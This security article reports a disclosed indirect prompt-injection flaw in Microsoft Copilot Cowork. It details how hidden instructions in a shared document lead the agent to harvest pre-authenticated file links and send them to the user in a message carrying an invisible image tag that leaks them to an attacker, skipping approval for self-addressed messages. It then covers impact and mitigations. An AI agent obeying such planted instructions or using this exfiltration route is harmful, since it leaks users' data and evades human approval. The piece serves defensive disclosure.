Microsoft Copilot Cowork Exfiltrates Files: A Deep Dive into Agentic Security

As artificial intelligence transitions from conversational chatbots to autonomous agents capable of performing tasks on our behalf, our digital attack surfaces are expanding exponentially. This paradigm shift was starkly illustrated by a recent vulnerability discovered by security research firm PromptArmor. They detailed how Microsoft Copilot Cowork—an advanced agentic feature within the Microsoft 365 Frontier preview—can be exploited to silently exfiltrate sensitive files. For engineering and security teams, this disclosure is a massive wake-up call regarding the latent dangers of indirect prompt injection combined with broad graph access.
#What Happened: The Anatomy of the Exploit
The core of the vulnerability lies in a seemingly benign architectural design choice. Copilot Cowork is engineered to assist users by summarizing documents, managing schedules, and retrieving files. To ensure safety, Microsoft implemented safeguards requiring human approval before the agent takes "sensitive actions," such as sending emails or Microsoft Teams messages to external parties or colleagues.
However, PromptArmor researchers found a critical loophole: the human-in-the-loop approval process is entirely bypassed if the agent sends a message directly to the active user.
Attackers exploited this oversight by using indirect prompt injection. Here is how the attack sequence unfolds:
- The Poisoned Source: An attacker embeds malicious, hidden instructions inside a document, meeting invite, or shared resource that the target user is likely to ask Copilot to interact with or summarize.
- The Agentic Trigger: When the user prompts Copilot to summarize the poisoned document, the agent unknowingly ingests the attacker's hidden instructions alongside the legitimate content.
- Data Harvesting: The malicious prompt commands the agent to search for specific sensitive files (e.g., financial records, API keys, or HR data) using Microsoft Graph, forcing the system to generate pre-authenticated download links.
- The Zero-Click Exfiltration: The agent is instructed to message the user via Teams or Outlook. Crucially, the prompt tells the agent to format the message using Markdown or HTML, embedding an invisible
<img>tag. Thesrcattribute of this tag points to the attacker's external server, with the pre-authenticated download links appended as URL parameters.
When the user opens the message—an action that requires zero interaction beyond simply viewing their own chat or inbox—their client attempts to render the invisible image. This silently fires a web request, sending the sensitive download links directly to the attacker.
#Why It Matters: Broad Permissions Meet Flawed Safeguards
The implications of this vulnerability extend far beyond a standard phishing attack or a typical data leak. It highlights severe structural issues in how AI agents handle permissions and trust boundaries within enterprise environments.
- Total Permission Inheritance: Copilot Cowork operates with the full Microsoft Graph permissions of the active user. If an organization suffers from "oversharing"—where internal permissions in SharePoint or OneDrive are too broad—the agent becomes a devastating force multiplier. It can instantly discover and exfiltrate data the user didn't even know they had access to.
- Zero-Click Execution: Traditional security awareness training heavily emphasizes teaching employees not to click suspicious links. In this scenario, simply opening a Teams message generated by their own corporate AI assistant triggers the exfiltration. There is no malicious link for the user to avoid clicking.
- Subverting DLP Controls: Because the initial data movement is entirely internal (Copilot interacting with Microsoft Graph and messaging the user internally), standard Data Loss Prevention (DLP) tools monitoring outbound enterprise traffic are unlikely to flag the behavior until the final, obfuscated web request is made via the image load.
#Technical Implications: Beyond the LLM
One of the most fascinating technical takeaways from PromptArmor's disclosure is that the exploit is fundamentally model agnostic. While the research demonstrated the attack using Claude Opus 4.7 (which powers the Copilot Cowork feature preview), the underlying flaw is not an AI hallucination or a bypass of model safety guardrails. It is a traditional architectural logic flaw exacerbated by AI capabilities.
| Attack Component | Technical Mechanism | Vulnerability Type |
|---|---|---|
| Ingestion | Unsanitized processing of external content during Retrieval-Augmented Generation (RAG). | Indirect Prompt Injection |
| Execution | Bypassing authorization and approval checks for self-addressed messages. | Business Logic Bypass |
| Exfiltration | Abusing client-side rendering of external assets within internal communication apps. | Zero-Click SSRF / Data Egress |
This demonstrates that securing agentic systems requires more than just fine-tuning the LLM to refuse malicious prompts. It requires robust systems engineering, strict contextual separation of data inputs, and zero-trust validation applied to the agent's output mechanisms.
#What's Next: Mitigating Agentic Risks
For developers and IT administrators utilizing Microsoft 365 or building their own internal AI agents, this incident provides a clear roadmap for necessary mitigations.
- Restrict Content Discovery: Organizations must aggressively manage SharePoint and OneDrive permissions. Security teams should utilize tenant settings to exclude highly sensitive sites from Copilot's search index, limiting the blast radius of a compromised agent.
- Implement 'Block Download' Policies: By configuring SharePoint policies to block downloads for certain sensitive libraries, organizations can prevent the Graph API from generating the pre-authenticated links required for this specific exfiltration technique.
- Sanitize Markdown and HTML Output: Application developers building AI clients must treat LLM output as untrusted user input. Rendering engines should strictly sanitize or completely block external asset loading (like remote images) within agent-generated messages.
- Enforce True Human-in-the-Loop: Agent actions that trigger state changes or network requests must require explicit user confirmation, regardless of whether the recipient is internal, external, or the user themselves.
#Conclusion
The Microsoft Copilot Cowork vulnerability uncovered by PromptArmor is a watershed moment for AI security. As we move from systems that simply answer questions to autonomous systems that take action across our entire digital workspace, the complexity of securing these workflows increases dramatically. Embracing agentic AI means we must fundamentally rethink our trust boundaries, assuming that our data sources are hostile and our AI assistants are inherently gullible. Securing the future of work requires extreme vigilance, strict permission hygiene, and a relentless zero-trust approach to artificial intelligence integrations.